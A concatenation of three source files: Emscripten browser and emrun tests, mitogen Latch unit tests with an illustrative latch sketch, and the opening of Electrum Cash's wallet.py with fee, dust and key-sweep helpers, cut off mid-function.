self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE', '-s', 'ENVIRONMENT=web', '-O2', '--closure=1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [test_file('browser_test_hello_world.c'), '-o', 'test.js', '-s', 'SINGLE_FILE']
if not wasm_enabled:
args += ['-s', 'WASM=0']
self.compile_btest(args)
create_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, the main application thread and the worker
# threads all run inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.compile_btest([test_file('pthread', 'test_pthread_atomics.cpp'), '-o', 'test.js', '-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
create_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?0')
def test_access_file_after_heap_resize(self):
create_file('test.txt', 'hello from file')
self.compile_btest([test_file('access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.compile_btest([test_file('access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_file('main.cpp', r'''
int main() {
REPORT_RESULT(0);
return 0;
}
''')
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(test_file('pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=[print]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-s', 'MODULARIZE'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# we also eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir; here we at least check that we do not regress compared to the
# normal case of finding it in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest(test_file('emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(test_file('emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(test_file('emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(test_file('emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest(test_file('emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(test_file('emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(test_file('emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(test_file('emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-s', 'ASYNCIFY'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(test_file('emscripten_console_log.c'), '0', args=['--pre-js', test_file('emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(test_file('emscripten_throw_number.c'), '0', args=['--pre-js', test_file('emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(test_file('emscripten_throw_string.c'), '0', args=['--pre-js', test_file('emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure=1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1'])
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1', '-s', 'WASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1', '-s', 'MINIMAL_RUNTIME'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1'], ['-s', 'SINGLE_FILE'], ['-s', 'WASM=0', '-s', 'SINGLE_FILE']]:
for modularize in [[], ['-s', 'MODULARIZE']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure=1'], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure', '1']]:
self.btest(test_file('small_hello_world.c'), '0', args=args + ['-s', 'MINIMAL_RUNTIME'])
@requires_threads
def test_offset_converter(self, *args):
try:
self.btest_exit(test_file('browser', 'test_offset_converter.c'), assert_returncode=1, args=['-s', 'USE_OFFSET_CONVERTER', '-g4', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
except Exception as e:
# dump the wasm file; this is meant to help debug #10539 on the bots
print(self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), 'test.wasm', '-g', '--print', '-all'], stdout=PIPE).stdout)
raise e
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest(test_file('browser', 'test_emscripten_unwind_to_js_event_loop.c'), '1', args=['-s', 'NO_EXIT_RUNTIME'])
def test_wasm2js_fallback(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
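# With -s WASM=2 the link step emits both test.wasm and a test.wasm.js
# (wasm2js) fallback; the renames below toggle which of the two load paths
# the page is able to take.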
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
# Then disable WebAssembly support in the VM and try again. It should still work via the Wasm2js fallback.
html = open('test.html', 'r').read()
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
open('test.html', 'w').write(html)
os.remove('test.wasm') # Also delete the Wasm file to test that no attempt is made to load it.
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
# Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_system(self):
self.btest(test_file('system.c'), '0')
# Tests that it is possible to hook into/override a symbol defined in a system library.
@requires_graphics_hardware
def test_override_system_js_lib_symbol(self):
# This test verifies it is possible to override a symbol from WebGL library.
# When WebGL is implicitly linked in, the implicit linking should happen before any user --js-libraries, so that they can adjust
# the behavior afterwards.
self.btest(test_file('test_override_system_js_lib_symbol.c'),
expected='5121',
args=['--js-library', test_file('test_override_system_js_lib_symbol.js')])
# When WebGL is explicitly linked to in strict mode, the linking order on command line should enable overriding.
self.btest(test_file('test_override_system_js_lib_symbol.c'),
expected='5121',
args=['-s', 'AUTO_JS_LIBRARIES=0', '-lwebgl.js', '--js-library', test_file('test_override_system_js_lib_symbol.js')])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4gb(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('browser', 'test_4GB.cpp', js_engines=[config.V8_ENGINE])
# Tests that emmalloc supports up to 4GB Wasm heaps.
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_4gb(self):
self.btest(test_file('mem_growth.cpp'),
expected='-65536', # == 4*1024*1024*1024 - 65536 casted to signed
args=['-s', 'MALLOC=emmalloc', '-s', 'ABORTING_MALLOC=0', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'MAXIMUM_MEMORY=4GB'])
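# Quick check of the expected value above (the signed 32-bit
# reinterpretation the comment describes):
assert (4 * 1024 * 1024 * 1024 - 65536) - 2 ** 32 == -65536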
# Test that it is possible to malloc() a huge 3GB memory block in 4GB mode using emmalloc.
# Also test emmalloc-memvalidate and emmalloc-memvalidate-verbose build configurations.
@no_firefox('no 4GB support yet')
def test_emmalloc_3GB(self):
def test(args):
self.btest(test_file('alloc_3gb.cpp'),
expected='0',
args=['-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ALLOW_MEMORY_GROWTH=1'] + args)
test(['-s', 'MALLOC=emmalloc'])
test(['-s', 'MALLOC=emmalloc-debug'])
test(['-s', 'MALLOC=emmalloc-memvalidate'])
test(['-s', 'MALLOC=emmalloc-memvalidate-verbose'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_2gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('browser', 'test_2GB_fail.cpp', js_engines=[config.V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ABORTING_MALLOC=0']
self.do_run_in_out_file_test('browser', 'test_4GB_fail.cpp', js_engines=[config.V8_ENGINE])
@disabled("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-s', 'ASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# the specific symptom of the hang that was fixed is that the test hangs
# at some point, using 0% CPU. often that occured in 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest(test_file('pthread', 'test_pthread_proxy_hammer.cpp'),
expected='0',
args=['-s', 'USE_PTHREADS', '-O2', '-s', 'PROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
def test_assert_failure(self):
self.btest(test_file('browser', 'test_assert_failure.c'), 'abort:Assertion failed: false && "this is a test"')
EMRUN = path_from_root('emrun')
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([EMRUN, '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([EMRUN, '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_no_browser(self):
# Test --no_browser mode where we have to take care of launching the browser ourselves
# and then killing emrun when we are done.
if not has_browser():
self.skipTest('need a browser')
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
proc = subprocess.Popen([EMRUN, '--no_browser', '.', '--port=3333'], stdout=PIPE)
try:
if EMTEST_BROWSER:
print('Starting browser')
browser_cmd = shlex.split(EMTEST_BROWSER)
browser = subprocess.Popen(browser_cmd + ['http://localhost:3333/hello_world.html'])
try:
while True:
stdout = proc.stdout.read()
if b'Dumping out file' in stdout:
break
finally:
print('Terminating browser')
browser.terminate()
browser.wait()
finally:
print('Terminating emrun server')
proc.terminate()
proc.wait()
def test_emrun(self):
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the
# browser that is launched will have that directory as its startup directory, and the browser will
# not close as part of the test, which on Windows pins down the cwd and makes it impossible to
# delete it. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [EMRUN, '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass an argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
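# For reference, the supported form separates emrun's own options from the
# page's arguments with `--`, e.g.:
#   emrun --port 6939 hello_world.html -- 1 2 --3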
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
stdout = open(self.in_dir('stdout.txt'), 'r').read()
stderr = open(self.in_dir('stderr.txt'), 'r').read()
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
|
latch_test.py |
import threading
import unittest2
import mitogen.core
import testlib
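# The tests in this file exercise mitogen.core.Latch semantics: a closeable,
# thread-safe FIFO where get() blocks until put() or close(), and where any
# operation on a closed latch raises LatchError. A minimal sketch of those
# semantics (illustrative only; not mitogen's actual implementation, which
# wakes sleepers via socket pairs rather than a condition variable):
import collections
import time

class SketchLatch(object):
    class LatchError(Exception):
        pass
    class TimeoutError(Exception):
        pass
    def __init__(self):
        self._cond = threading.Condition()
        self._items = collections.deque()
        self._closed = False
    def close(self):
        with self._cond:
            self._closed = True
            self._cond.notify_all()
    def empty(self):
        with self._cond:
            return not self._items
    def put(self, obj=None):
        with self._cond:
            if self._closed:
                raise self.LatchError()
            self._items.append(obj)
            self._cond.notify()
    def get(self, timeout=None, block=True):
        with self._cond:
            deadline = None if timeout is None else time.monotonic() + timeout
            while True:
                if self._closed:
                    raise self.LatchError()
                if self._items:
                    return self._items.popleft()
                remaining = None if deadline is None else deadline - time.monotonic()
                if not block or (remaining is not None and remaining <= 0):
                    raise self.TimeoutError()
                self._cond.wait(remaining)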
class EmptyTest(testlib.TestCase):
klass = mitogen.core.Latch
def test_is_empty(self):
latch = self.klass()
self.assertTrue(latch.empty())
def test_is_nonempty(self):
latch = self.klass()
latch.put(None)
self.assertTrue(not latch.empty())
class GetTest(testlib.TestCase):
klass = mitogen.core.Latch
# TODO: test multiple waiters.
def test_empty_noblock(self):
latch = self.klass()
exc = self.assertRaises(mitogen.core.TimeoutError,
lambda: latch.get(block=False))
def test_empty_zero_timeout(self):
latch = self.klass()
exc = self.assertRaises(mitogen.core.TimeoutError,
lambda: latch.get(timeout=0))
def test_nonempty(self):
obj = object()
latch = self.klass()
latch.put(obj)
self.assertEquals(obj, latch.get())
def test_nonempty_noblock(self):
obj = object()
latch = self.klass()
latch.put(obj)
self.assertEquals(obj, latch.get(block=False))
def test_nonempty_zero_timeout(self):
obj = object()
latch = self.klass()
latch.put(obj)
self.assertEquals(obj, latch.get(timeout=0))
class ThreadedGetTest(testlib.TestCase):
klass = mitogen.core.Latch
def setUp(self):
super(ThreadedGetTest, self).setUp()
self.results = []
self.excs = []
self.threads = []
def _worker(self, func):
try:
self.results.append(func())
except Exception as e:
self.results.append(None)
self.excs.append(e)
def start_one(self, func):
thread = threading.Thread(target=self._worker, args=(func,))
thread.start()
self.threads.append(thread)
def join(self):
for th in self.threads:
th.join(3.0)
def test_one_thread(self):
latch = self.klass()
self.start_one(lambda: latch.get(timeout=3.0))
latch.put('test')
self.join()
self.assertEquals(self.results, ['test'])
self.assertEquals(self.excs, [])
def test_five_threads(self):
latch = self.klass()
for x in range(5):
self.start_one(lambda: latch.get(timeout=3.0))
for x in range(5):
latch.put(x)
self.join()
self.assertEquals(sorted(self.results), list(range(5)))
self.assertEquals(self.excs, [])
class PutTest(testlib.TestCase):
klass = mitogen.core.Latch
def test_put(self):
latch = self.klass()
latch.put(None)
self.assertEquals(None, latch.get())
class CloseTest(testlib.TestCase):
klass = mitogen.core.Latch
def test_empty_noblock(self):
latch = self.klass()
latch.close()
self.assertRaises(mitogen.core.LatchError,
lambda: latch.get(block=False))
def test_empty_zero_timeout(self):
latch = self.klass()
latch.close()
self.assertRaises(mitogen.core.LatchError,
lambda: latch.get(timeout=0))
def test_nonempty(self):
obj = object()
latch = self.klass()
latch.put(obj)
latch.close()
self.assertRaises(mitogen.core.LatchError,
lambda: latch.get())
def test_nonempty_noblock(self):
obj = object()
latch = self.klass()
latch.put(obj)
latch.close()
self.assertRaises(mitogen.core.LatchError,
lambda: latch.get(block=False))
def test_nonempty_zero_timeout(self):
obj = object()
latch = self.klass()
latch.put(obj)
latch.close()
self.assertRaises(mitogen.core.LatchError,
lambda: latch.get(timeout=0))
def test_put(self):
latch = self.klass()
latch.close()
self.assertRaises(mitogen.core.LatchError,
lambda: latch.put(None))
def test_double_close(self):
latch = self.klass()
latch.close()
latch.close()
class ThreadedCloseTest(testlib.TestCase):
klass = mitogen.core.Latch
def setUp(self):
super(ThreadedCloseTest, self).setUp()
self.results = []
self.excs = []
self.threads = []
def _worker(self, func):
try:
self.results.append(func())
except Exception as e:
self.results.append(None)
self.excs.append(e)
def start_one(self, func):
thread = threading.Thread(target=self._worker, args=(func,))
thread.start()
self.threads.append(thread)
def join(self):
for th in self.threads:
th.join(3.0)
def test_one_thread(self):
latch = self.klass()
self.start_one(lambda: latch.get(timeout=3.0))
latch.close()
self.join()
self.assertEquals(self.results, [None])
for exc in self.excs:
self.assertTrue(isinstance(exc, mitogen.core.LatchError))
def test_five_threads(self):
latch = self.klass()
for x in range(5):
self.start_one(lambda: latch.get(timeout=3.0))
latch.close()
self.join()
self.assertEquals(self.results, [None]*5)
for exc in self.excs:
self.assertTrue(isinstance(exc, mitogen.core.LatchError))
if __name__ == '__main__':
unittest2.main()
|
wallet.py | # Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - ImportedAddressWallet: imported address, no keystore
# - ImportedPrivkeyWallet: imported private keys, keystore
# - Standard_Wallet: one keystore, P2PKH
# - Multisig_Wallet: several keystores, P2SH
import copy
import errno
import json
import itertools
import os
import queue
import random
import threading
import time
from collections import defaultdict, namedtuple
from enum import Enum, auto
from functools import partial
from typing import Set, Tuple, Union
from .i18n import ngettext
from .util import (NotEnoughFunds, ExcessiveFee, PrintError, UserCancelled, profiler, format_satoshis, format_time,
finalization_print_error, to_string, TimeoutException)
from .address import Address, Script, ScriptOutput, PublicKey, OpCodes
from .bitcoin import *
from .version import *
from .keystore import load_keystore, Hardware_KeyStore, Imported_KeyStore, BIP32_KeyStore, xpubkey_to_address
from . import networks
from . import keystore
from .storage import multisig_type, WalletStorage
from . import transaction
from .transaction import Transaction, InputValueMissing
from .plugins import run_hook
from . import bitcoin
from . import coinchooser
from .synchronizer import Synchronizer
from .verifier import SPV, SPVDelegate
from . import schnorr
from . import ecc_fast
from .blockchain import NULL_HASH_HEX
from . import paymentrequest
from .paymentrequest import InvoiceStore, PR_PAID, PR_UNCONFIRMED, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .contacts import Contacts
from . import cashacct
from . import slp
def _(message): return message
TX_STATUS = [
_('Unconfirmed parent'),
_('Low fee'),
_('Unconfirmed'),
_('Not Verified'),
]
del _
from .i18n import _
DEFAULT_CONFIRMED_ONLY = False
def relayfee(network):
RELAY_FEE = 5000
MAX_RELAY_FEE = 50000
f = network.relay_fee if network and network.relay_fee else RELAY_FEE
return min(f, MAX_RELAY_FEE)
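# Illustrative sketch (values are hypothetical): relayfee() falls back to
# RELAY_FEE when offline and clamps whatever the server reports:
#   relayfee(None) == 5000                              # no network: default
#   relayfee(net) == 50000  if net.relay_fee == 80000   # clamped to MAX_RELAY_FEE
#   relayfee(net) == 7000   if net.relay_fee == 7000    # passed through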
def dust_threshold(network):
# Change < dust threshold is added to the tx fee
#return 182 * 3 * relayfee(network) / 1000 # original Electrum logic
#return 1 # <-- was this value until late Sept. 2018
return 546 # hard-coded Bitcoin Cash dust threshold. Was changed to this as of Sept. 2018
def sweep_preparations(privkeys, network, imax=100):
class InputsMaxxed(Exception):
pass
def append_utxos_to_inputs(inputs, pubkey, txin_type):
if txin_type == 'p2pkh':
address = Address.from_pubkey(pubkey)
else:
address = PublicKey.from_pubkey(pubkey)
sh = address.to_scripthash_hex()
u = network.synchronous_get(('blockchain.scripthash.listunspent', [sh]))
for item in u:
if len(inputs) >= imax:
raise InputsMaxxed()
item['address'] = address
item['type'] = txin_type
item['prevout_hash'] = item['tx_hash']
item['prevout_n'] = item['tx_pos']
item['pubkeys'] = [pubkey]
item['x_pubkeys'] = [pubkey]
item['signatures'] = [None]
item['num_sig'] = 1
inputs.append(item)
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = bitcoin.public_key_from_private_key(privkey, compressed)
append_utxos_to_inputs(inputs, pubkey, txin_type)
keypairs[pubkey] = privkey, compressed
inputs = []
keypairs = {}
try:
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
elif txin_type == 'p2sh':
raise ValueError(_("The specified WIF key '{}' is a p2sh WIF key. These key types cannot be swept.").format(sec))
except InputsMaxxed:
pass
if not inputs:
raise ValueError(_('No inputs found. (Note that inputs need to be confirmed)'))
return inputs, keypairs
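# Shape of sweep_preparations()'s return values, as built above (txids and
# pubkeys below are placeholders, not real data):
#   inputs   -> [{'address': ..., 'type': 'p2pkh', 'prevout_hash': '<txid>',
#                 'prevout_n': 0, 'pubkeys': ['<pubkey>'], 'x_pubkeys': ['<pubkey>'],
#                 'signatures': [None], 'num_sig': 1, ...}, ...]
#   keypairs -> {'<pubkey>': (privkey, compressed)}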
def sweep(privkeys, network, config, recipient, fee=None, imax=100, sign_schnorr=False):
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(i.get('value') for i in inputs)
if fee is None:
outputs = [(TYPE_ADDRESS, recipient, total)]
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < dust_threshold(network):
